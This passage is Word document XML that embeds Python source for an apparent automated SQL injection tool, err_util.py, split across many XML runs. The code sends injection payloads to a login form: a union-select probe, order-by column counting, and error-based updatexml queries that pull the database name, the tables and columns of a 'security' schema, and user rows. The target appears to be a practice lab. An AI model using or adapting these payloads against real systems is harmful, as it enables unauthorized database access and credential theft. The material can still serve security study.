        <w:t>columns.strip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6F8C6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Try to get Data........')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6AB605" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ED5ACC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get_values_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>bool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0652AC7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2CAECDA3" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4913A47B" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRDefault="00B2088F" w:rsidP="00B2088F"/>
    <w:p w14:paraId="1199DA5A" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:pStyle w:val="6"/>
      </w:pPr>
      <w:r>
        <w:t>Posts/err_util.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565A761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urllib</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> import request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6771A1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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>urllib.parse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>urlencode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0D44245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bs4 import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>BeautifulSoup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0A32DC6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time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3DF0C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re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4AACD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termcolor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> import colored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED607A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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>sqlis.modules</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.posts.bool_util</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>do_bool_injection</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="73EF7C8F" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="458A6878" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69D69A6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def log(content):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EF822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time.strftime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">('%H:%H:%S', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>time.local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ime.time</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>()))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4761906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colored('[' + str(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>) + ']', 'green') + content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04ED7EA9" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2620D890" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5520C48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_):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651F91E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log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072D539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_ = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>urlencode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(data_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EC87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_ = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>_.encode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1028D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 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>request.urlopen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=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=data_)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFC524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str(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>res.read</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>().decode('utf-8'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DECEC71" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0537A0EB" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4225003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can_injec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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2085CAD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 xml:space="preserve"> = ["'", '")', "')", '"']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C489C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item in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>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59E67D0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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A58027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"admin" + str(item) + " union select 1=1,2#",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D633F3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passwd': "admin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037BD18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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40211D20" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5167379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, data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCD0D1F" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="787D59F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7BF154B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744CA1C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fonts1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE88998" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05F36EC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66EC901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Exist SQL Injection')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C61BCF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turn True, item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9B496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1C5C40C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Not Exist SQL Injection')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A2CC61E" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42B92180" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5346F29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test_order_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>by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63D60C9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lag = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AE908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50):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EAFB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Order By Test -&gt; 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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C359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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224C73F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'admin' + symbol + ' order by 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#',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A08972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passwd': "admin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669A97C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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BD1EA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194EE94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result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035924F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0DECB4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4CD98F1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 =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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5152B3E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1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6CCC834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"Login" not in fonts1[0]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD4226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"No render......")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71381EC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turn '0'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1101D16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"slap" in content:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DCA06F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Order By Test Success -&gt; order by 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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A795F2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lag = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D447B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break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="073AA6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flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7002A2E2" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="302FB2D6" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30EC839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exec_function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function):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C8165D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global res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2CBA1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4DEC5EE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and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>updatexml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1,concat(0x7e,(" + function + "),0x7e),1)#",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000257A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74E98C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3EB7DEEE" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EF0356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503D0A8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50C8D42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437F951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fonts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1088552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ntent = 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1].text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5938587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ry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A5D09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 = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>re.findall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>('.*~(.*)~.*', content)[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3141615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xcept Exception:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344030E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do_bool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1DA1EAA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res</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B33053" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6051DA6F" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F35BEF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database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0BEB35F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5981F5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"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": "1" + symbol + " and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>updatexml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1,concat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>(0x7e,(database()),0x7e),1)#",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AE9FD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6B36D7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31FB94E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1B8D4D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spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>result.find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>('MySQL') != -1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D37B5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'MySQL'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A30A35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46F6DA1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'Cannot get database'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0719282E" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B272A4D" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="588EB1A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tables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754219D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03E787C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"1" + symbol + " and 1 union select </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1,updatexml</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">(1,concat(0x7e,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)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6450E29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" from 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tables</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> where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 xml:space="preserve"> = 'security' limit 0,1),0x7e),1)#",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E119A0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544E592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5CBF14D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299071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255E0D3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242DE42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fonts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9678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 = 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1].text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A9D438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ry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E35340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tbs = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>re.findall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>('.*~(.*)~.*', ret)[0].split(',')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A19555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xcept Exception:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EBED4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do_bool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4DFAB49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print(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tbs[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EF62C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bs_ = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BADE05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tb in tbs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08840DE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tbs_ += tb + ', '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D14FA8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tbs</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>_[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: -2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DCEB8F" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E459BDA" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F78B7F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columns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75353F7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16CF8FF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"1" + symbol + " and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>updatexml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1,concat(0x7e,(select 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lumn_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>) "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D1EBE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"from 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columns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> where 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='users' limit 0,1),0x7e),1)#",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17534D6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71CDAF3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7AC7339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4713B9B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5AC89DC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5D5A0EF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fonts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FD2FF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 = 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1].text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2625D1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s = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>re.findall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>('.*~(.*)~.*', ret)[0].split(',')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E1F86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print(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tbs[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>0])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0290E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s_ = ''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007CFA4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col in </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cols[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>: -1]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559B51C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s_ += col + ', '</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429C6DF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r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cols</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>_[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>:-2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0634B1DF" w14:textId="77777777" w:rsidR="00B2088F" w:rsidRPr="007A1781" w:rsidRDefault="00B2088F" w:rsidP="00B2088F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E98708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data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2921036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728CF1B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"1" + symbol + " and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>updatexml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1,concat(0x7e,(select count(*) "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2420FAA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"from users limit 0,1),0x7e),</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1)#</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203BB88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2E23A65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28B0CBB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218323B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3EFDD1D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2A68CF7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fonts)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11EC13A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resc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 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1].text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BB88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res)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D742AA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resc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re.findall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">('.*~(.*)~.*', </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>resc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C941C2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 xml:space="preserve">"res-count:" + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>resc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490A0BA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_ = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dict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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216E7BB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range(int(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>resc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A1781">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268DA2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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229671F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"1" + symbol + " and </w:t>
